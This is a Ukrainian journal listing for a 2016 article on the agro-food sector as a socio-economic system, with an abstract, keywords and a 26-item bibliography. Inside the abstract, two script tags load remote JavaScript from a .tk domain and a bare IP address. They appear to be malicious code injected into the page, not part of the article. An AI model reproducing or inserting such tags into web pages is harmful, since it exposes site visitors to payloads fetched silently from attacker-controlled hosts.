ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.439:330(477)
Економіка агропромислового виробництва

Агропродовольчий сектор України: економічний дискурс / Pugachov M.I., Болдирєва Л.М. // Економіка АПК. - 2016. - № 11 - С. 15

Метою статті є дискурсивний аналіз агропродовольчого сектора економіки як соціально-економічної системи. У процесі дослідження використано системний підхід. Здійснено аналіз понять «система», «економічна система», «соціальна система», «соціально-економічна система». Доведено, що агропродовольча система складається з підсистем першого та другого рівнів. До підсистем першого рівня належать операційна, логістична, фінансова, інформаційно-комунікативна й територіальна підсистеми, які у свою чергу розподіляються на підсистеми другого рівня, що конкретизують окремі завдання функціонування агропродовольчої системи. Ідентифіковано агропродовольчий сектор як соціально-економічну систему - сукупність взаємозв’язаних галузей (видів діяльності) та сільської території з населенням, які утворюють разом певну цілісність, що охоплюють процеси виробництва, життєзабезпечення регіону, обміну і споживання аграрної продукції та продовольства, забезпечення розвитку відповідних територій, складаються з підсистем першого й другого рівнів. Зазначені підходи можуть бути використані органами державної влади та місцевого самоврядування при плануванні й прогнозуванні розвитку економіки на макрорівні. Бібліогр.: 26.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: агропродовольчий сектор, соціально-економічна система, підсистеми, економіка, дискурсний аналіз, галузеві стратегії

Список використаних джерел

 1. Болдирєва Л.М. Інноваційна діяльність в агропродовольчому секторі економіки / Л.М. Болдирєва // Інвестиції: практика та досвід. - 2014. - № 3. - С. 36-40.
 2. Большой толковый социологический словарь / Д. Джери, Дж. Джери. - У 2-х т. - Т.2. - М. : АСТ, Вече, 1999. - 528 с.
 3. Геттинг Б. Предприятие как продуктивная социальная система / Б. Геттинг // Экономические отношения. - 2012. - №1 (3). - С. 34-45.
 4. Економічна енциклопедія : у трьох томах / Редкол.. С.В. Мочерний (відпов. ред.) та ін. - Т.3. - К. : ВЦ «Академія», 2002. - 952 с.
 5. Економічна енциклопедія : у трьох томах / Редкол.. С.В. Мочерний (відпов. ред.) та ін. - Т.1. - К. : ВЦ «Академія», 2000. - 864 с.
 6. Економічна теорія: Політекономія: [підруч.]; за ред. В.Д. Базилевича. - К. : Знання-Пресс, 2006. - 582 с.
 7. Крапивенский С.Э. Социальная философия: [учеб.] / С.Э. Крапивенский [3-е изд., исправл. и доп.]. - Волгоград : Комитет по печати, 1996. - 352 с.
 8. Крупка М.І. Основи економічної теорії: підруч. / М.І. Крупка, П.І. Островерх, С.К. Реверчук; Львівський нац. ун-т ім. Івана Франка. - К. : Атіка, 2001. - 344 с.
 9. Крылатых Э.Н. Агропродовольственный сектор: многофункциональность, факторы развития, риски / Э.Н. Крылатых // Економіка АПК. - 2010. - №2. - С. 162-164.
 10. Кульчицький Б.В. Сучасні економічні системи: [навчальний посібник] / Б.В. Кульчицький. - Л. : Афіша, 2004. - 280 с.
 11. Лебедев С.А. Философия науки: Словарь основных терминов / С.А. Лебедев. - М. : Академический Проект, 2004. - 320 с.
 12. Лопатников Л.И. Экономико-математический словарь: Словарь современной экономической науки / Л. И. Лопатников; под ред. Г.Б. Клейнера [5-е изд., перераб. и доп.]. - М. : Дело, 2003. - 520 с.
 13. Ляшенко В.І. Регулювання розвитку економічних систем: теорія, режим, інструменти : [моногр.] / В.І. Ляшенко. - Донецьк : ДонНТУ, 2006. - 668 с.
 14. Малассис Л. Анализ продовольственного сектора в рыночной экономике: методологические аспекты / Л. Малассис // Интеграция и сотрудничество в агропродовольственной сфере: ХХI семинар Европейской ассоциации экономистов-аграрников (Киев, 3-7 октября 1989 г.). - К. , 1989. - С. 89-100.
 15. Матвеева Е.Ю. Концепции современного естествознания. Словарь основных терминов [Электронный ресурс] / Е.Ю. Матвеева. - Новосибирск, 2007. - Режим доступа : http://terme.ru/dictionary/1072.
 16. Новейший философский словарь [3-е изд., исправл.]. - Мн. : Книжный Дом, 2003. - 1280 с.
 17. Новий тлумачний словник української мови / Уклад. В. Яременко, О. Сліпушко. - У трьох томах. - Т. 3 [вид. 2-ге, виправл.]. - К. : Аконіт, 2003. - 862 с.
 18. Основи економічних знань: навч. посібник / А.С. Гальчинський, П.С. Єщенко, Ю.І. Палкін [2-ге вид., перероб. і доп.]. - К. : Вища школа, 2002. - 544 с.
 19. Панчишин С.М. Макроекономіка: [навч. посіб.] / С.М. Панчишин. - К. : Либідь, 2001. - 614 с.
 20. Словарь по географии [Электронный ресурс] // Словари и энциклопедии на Академике. - Режим доступа : http://dic.academic.ru/.
 21. Социально-экономическая система [Электронный ресурс] // Википедия. Свободная энциклопедия. - Режим доступа : https://ru.wikipedia.org/wiki/.
 22. Социология: словарь / В.И. Добреньков, А.И. Кравченко. - У 3-х т. - М.: Социологический факультет МГУ им. М. В. Ломоносова, 2004. - 768 с.
 23. Социология: Энциклопедия / [cост. А.А. Грицанов, В.Л. Абушенко, Г.М. Евелькин, Г.Н. Соколова, О.В. Терещенко]. - Мн. : Книжный Дом, 2003. - 1312 с.
 24. Ткаченко В.А. Социально-экономические системы: сущность и механизм управления / В.А. Ткаченко, С.И. Чимшит // Вісн. економічної науки України. - 2004. - №2. - С. 38-48.
 25. Философский словарь / Андре Конт-Спонвиль; пер. с франц. Е.В.Головиной. - М. : ООО «Издательство «Этерна», 2012. - 752 с.
 26. Шубравська О.В. Інноваційні трансформації агропродовольчого сектора економіки: світові тенденції та вітчизняні реалії [Електронний ресурс] / О.В. Шубравська. - Режим доступу: http://www.nbuw.gov.ua/ portal/Sos_gum/ep /2010_3/7_Shubravska.pdf.
Читати статтю: e_apk_2016_11_4.pdf